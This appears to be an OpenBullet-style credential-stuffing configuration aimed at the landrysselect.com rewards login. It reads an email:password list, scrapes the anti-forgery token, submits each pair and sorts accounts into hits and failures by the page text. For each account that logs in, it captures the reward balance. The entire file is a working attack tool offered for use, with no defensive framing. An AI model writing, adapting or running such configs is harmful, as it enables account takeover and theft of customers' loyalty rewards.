[SETTINGS]
{
  "Name": "landrysselect",
  "SuggestedBots": 1,
  "LastModified": "2019-03-29T03:12:02.4541494+01:00",
  "AdditionalInfo": "",
  "Author": "Om4r",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://www.landrysselect.com/login/" AutoRedirect=FALSE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
PARSE "<SOURCE>" LR "<input name=\"__RequestVerificationToken\" type=\"hidden\" value=\"" "\"" Recursive=FALSE -> VAR "tt" "" "" 
REQUEST POST "https://www.landrysselect.com/login/Login/" AutoRedirect=TRUE 
  CONTENT "__RequestVerificationToken=<tt>&LoginPostbackData.Email=<USER>&LoginPostbackData.Password=<PASS>&LoginPostbackData.RememberMe=false" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 258" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Host: www.landrysselect.com" 
  HEADER "Origin: https://www.landrysselect.com" 
  HEADER "Referer: https://www.landrysselect.com/login/" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Incorrect Username/Password. Please try again." 
  KEYCHAIN Success OR 
    KEY "\">LOGOUT</a>" 
PARSE "<SOURCE>" LR "Your reward balance is " "." Recursive=FALSE -> CAP "Reward" "" "" 
